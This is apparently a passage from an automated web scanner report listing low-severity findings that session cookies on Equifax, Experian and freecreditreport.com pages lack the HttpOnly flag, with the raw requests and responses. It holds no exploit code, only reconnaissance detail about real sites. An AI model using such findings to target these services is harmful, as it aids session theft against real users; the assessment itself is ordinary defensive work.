<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Per
...[SNIP]...

18.114. https://www.econsumer.equifax.com/otc/personalInfo.ehtml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.econsumer.equifax.com
Path:   /otc/personalInfo.ehtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /otc/personalInfo.ehtml HTTP/1.1
Host: www.econsumer.equifax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=857e5247922609777fdaaf17d37b; style=null; hbx.hc3=null; JROUTE=ush2; foresee.session=%7B%22cpps%22%3A%7B%22oecpp_prod_cd%22%3A%22ESNP3%22%2C%22oecpp_pricing_opt%22%3A%22%22%2C%22oecpp_partner_cd%22%3A%22CJ%22%2C%22oecpp_exit_page_name%22%3A%22Personal%2Binformation-ESNP3%22%7D%2C%22alive%22%3A1%2C%22paused%22%3A%220%22%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A10%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A5%2C%22start%22%3A1303614753409%2C%22pv%22%3A3%2C%22current%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22cdi%22%3A3%2C%22lc%22%3A%7B%22equifax-browse%22%3A3%7D%2C%22ls%22%3A%7B%22equifax-browse%22%3Atrue%7D%2C%22ec%22%3A%7B%22equifax-browse%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22equifax-browse%22%2C%22idx%22%3A3%7D%2C%22previous%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22finish%22%3A1303615150503%7D; CP=null*; hbx.timestamp=1303614816593; hbx.hc2=CJ; foresee.alive=1303614816186;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 16:53:46 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=886e62818fa6c33fbbcc7ef59ff42; Path=/otc; Secure
Set-cookie: JROUTE=iFbh; Path=/otc; Secure
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Personal
...[SNIP]...

18.115. https://www.econsumer.equifax.com/otc/sitepage.ehtml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.econsumer.equifax.com
Path:   /otc/sitepage.ehtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /otc/sitepage.ehtml HTTP/1.1
Host: www.econsumer.equifax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=857e5247922609777fdaaf17d37b; style=null; hbx.hc3=null; JROUTE=ush2; foresee.session=%7B%22cpps%22%3A%7B%22oecpp_prod_cd%22%3A%22ESNP3%22%2C%22oecpp_pricing_opt%22%3A%22%22%2C%22oecpp_partner_cd%22%3A%22CJ%22%2C%22oecpp_exit_page_name%22%3A%22Personal%2Binformation-ESNP3%22%7D%2C%22alive%22%3A1%2C%22paused%22%3A%220%22%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A10%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A5%2C%22start%22%3A1303614753409%2C%22pv%22%3A3%2C%22current%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22cdi%22%3A3%2C%22lc%22%3A%7B%22equifax-browse%22%3A3%7D%2C%22ls%22%3A%7B%22equifax-browse%22%3Atrue%7D%2C%22ec%22%3A%7B%22equifax-browse%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22equifax-browse%22%2C%22idx%22%3A3%7D%2C%22previous%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22finish%22%3A1303615150503%7D; CP=null*; hbx.timestamp=1303614816593; hbx.hc2=CJ; foresee.alive=1303614816186;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 16:53:34 GMT
Content-type: text/html;charset=ISO-8859-1
X-powered-by: Servlet/2.4 JSP/2.0
Set-cookie: JSESSIONID=886e3401ea8f485794cff931ce85e; Path=/otc; Secure
Set-cookie: JROUTE=13w-; Path=/otc; Secure
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Equifax Personal
...[SNIP]...

18.116. https://www.equifax.com/cs/SessionPingHandler  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.equifax.com
Path:   /cs/SessionPingHandler

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs/SessionPingHandler HTTP/1.1
Host: www.equifax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: hbx.hc3=null; foresee.session=%7B%22cpps%22%3A%7B%22oecpp_prod_cd%22%3A%22ESNP3%22%2C%22oecpp_pricing_opt%22%3A%22%22%2C%22oecpp_partner_cd%22%3A%22CJ%22%2C%22oecpp_exit_page_name%22%3A%22Personal%2Binformation-ESNP3%22%7D%2C%22alive%22%3A1%2C%22paused%22%3A%220%22%2C%22browser%22%3A%7B%22name%22%3A%22Chrome%22%2C%22version%22%3A10%2C%22platform%22%3A%22Windows%22%7D%2C%22timeout%22%3A5%2C%22start%22%3A1303614753409%2C%22pv%22%3A3%2C%22current%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22cdi%22%3A3%2C%22lc%22%3A%7B%22equifax-browse%22%3A3%7D%2C%22ls%22%3A%7B%22equifax-browse%22%3Atrue%7D%2C%22ec%22%3A%7B%22equifax-browse%22%3A0%7D%2C%22sd%22%3A%7B%22name%22%3A%22equifax-browse%22%2C%22idx%22%3A3%7D%2C%22previous%22%3A%22https%3A%2F%2Fwww.econsumer.equifax.com%2Fotc%2Flanding.ehtml%3F%25255estart%3D%26companyName%3Dcj_esnp3r%26AID%3D10751987%26PID%3D1911961%26SID%3Dgid9a%252bidentity%252btheft%252bresource_ordering34--2011-04-23--20-10-04CD1%22%2C%22finish%22%3A1303615150503%7D; hbx.timestamp=1303614816593; hbx.hc2=CJ;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 16:53:11 GMT
Content-length: 658
Content-type: text/javascript;charset=ISO-8859-1
X-powered-by: Servlet/2.4
Set-cookie: JSESSIONID=886ddb31d227f4ec037a47535d4d1; Path=/cs; Secure
Set-cookie: JROUTE=tKSp; Path=/cs; Secure
Connection: close

function addifrcs(){
ifrcs = document.createElement('IFRAME');
ifrcs.setAttribute('src','https://www.equifax.com/cs/cscookies.html');
ifrcs.setAttribute('width','0');
ifrcs.setAttribute('height','0');
...[SNIP]...

18.117. http://www.experiandirect.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.experiandirect.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sun, 24 Apr 2011 19:47:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://www.experiandirect.com/triplealert/default.aspx
Content-Length: 176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSASDRQAB=DDHBNJACNMENABBGPHJAMCIB; path=/
Cache-control: private
Set-Cookie: BIGipServerexperiandirect-web-pool=175394314.27679.0000; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.experiandirect.com/triplealert/default.aspx">here</a>.</body>

18.118. http://www.experiandirect.com/triplealert/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.experiandirect.com
Path:   /triplealert/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/default.aspx?sc=668715 HTTP/1.1
Host: www.experiandirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:09:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=zr3tou55m3a0i4eorzcaufmo; path=/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: OriginalReferrer=; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=default; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 1:09:51 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavFlowID=; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NumTrialDaysLeft=; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=34583200ffc245f6a552e0d2fa80561b; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 15198

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           Protect yourself from identity theft with Credit Monitoring from TripleAlert.com
       </title>
       <meta nam
...[SNIP]...

18.119. https://www.experiandirect.com/triplealert/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.experiandirect.com
Path:   /triplealert/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /triplealert/default.aspx HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:27:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=cjpcey55elklnvvzl01tip45; path=/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: OriginalReferrer=; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=default; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 1:27:53 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavFlowID=; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NumTrialDaysLeft=; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=9e0b3c3a11964bc180ff938f140a5433; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 15188

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           Protect yourself from identity theft with Credit Monitoring from TripleAlert.com
       </title>
       <meta nam
...[SNIP]...

18.120. http://www.fightidentitytheft.com/credit-monitoring.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fightidentitytheft.com
Path:   /credit-monitoring.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit-monitoring.html HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=8d6f98f4d20d1ff037ac5b3e30142094; expires=Tue, 17-May-2011 23:19:27 GMT; path=/; domain=.fightidentitytheft.com
Last-Modified: Sun, 24 Apr 2011 19:17:59 GMT
ETag: "ebec15374e4c8c133be90bb1430afb94"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 25663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

18.121. http://www.freecreditreport.com/about-us/javascripts/s_code.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freecreditreport.com
Path:   /about-us/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about-us/javascripts/s_code.axd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=3w5trh45hjku1a45tnxpnz45; path=/
Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=s_code.axd; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 6:31:33 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=8d66b3b2e005402d92feeabc96a39128; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:31:33 GMT
ETag: "pv4db4cadd08ecae55efc49ebc12821b3f"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C76613.A70594.RA0.G11457.U6DA05CC6].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 13155

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           About Free Credit Report | Free Credit Report
       </title>
       <meta name="GENERATOR" Content="Microsoft Vi
...[SNIP]...

18.122. http://www.freecreditreport.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freecreditreport.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?sc=670839&bcd=daB7KMjz&mkwid=sdaB7KMjz&pcrid=6283273924&kwid=credit%20monitoring HTTP/1.1
Host: www.freecreditreport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26DA3ED6851D2621-40000127A02824B7[CE]

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=sqbvmyiqvnixtaqy5k0d4yqf; path=/
Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:54:36 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=1062; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=7135d595e6d7454c98dae899d7749053; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:54:36 GMT
ETag: "pv8c989b447d4b448d39e7b7d5f33f7c53"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C76613.A70584.RA0.G11456.U2FCB3501].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 14619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           Credit Report and Credit History | Free Credit Report
       </title>
       <meta name="GENERATOR" Content="Micr
...[SNIP]...

18.123. http://www.freecreditreport.com/javascripts/javascripts/s_code.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freecreditreport.com
Path:   /javascripts/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascripts/javascripts/s_code.axd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com
Cookie: s_vi=[CS]v1|26DA62F6851D24BE-40000107004A33F4[CE]

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=mtzvjt55al1qng55ywtodmum; path=/
Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=s_code.axd; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:53:52 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=d2d3377b41ed42cd832c20d30a07b42d; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:53:52 GMT
ETag: "pv7108be31de3242966a2fd92e6e57593f"
Expires: Wed, 27 Apr 2011 00:53:52 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C76613.A70594.RA70541.G11457.UE5039C29].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65900

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expilive, expitrulyfree, expiglobal"

...[SNIP]...

18.124. http://www.freecreditreport.com/javascripts/s_code.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freecreditreport.com
Path:   /javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /javascripts/s_code.axd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=yefkzs45fdz2dzbi0rqckb55; path=/
Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=s_code.axd; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:52:55 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=ec226076569c45fe8308198881a00200; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Mon, 25 Apr 2011 00:52:55 GMT
ETag: "pv7108be31de3242966a2fd92e6e57593f"
Expires: Wed, 27 Apr 2011 00:52:55 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C76613.A70594.RA70541.G11457.U87C5DBB3].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65900

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expilive, expitrulyfree, expiglobal"

...[SNIP]...

18.125. http://www.freecreditreport.com/privacy-policy/javascripts/s_code.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freecreditreport.com
Path:   /privacy-policy/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy-policy/javascripts/s_code.axd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com
Cookie: s_vi=[CS]v1|26DA62F6851D24BE-40000107004A33F4[CE]

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=45rs5x45eloigcqckzwoil45; path=/
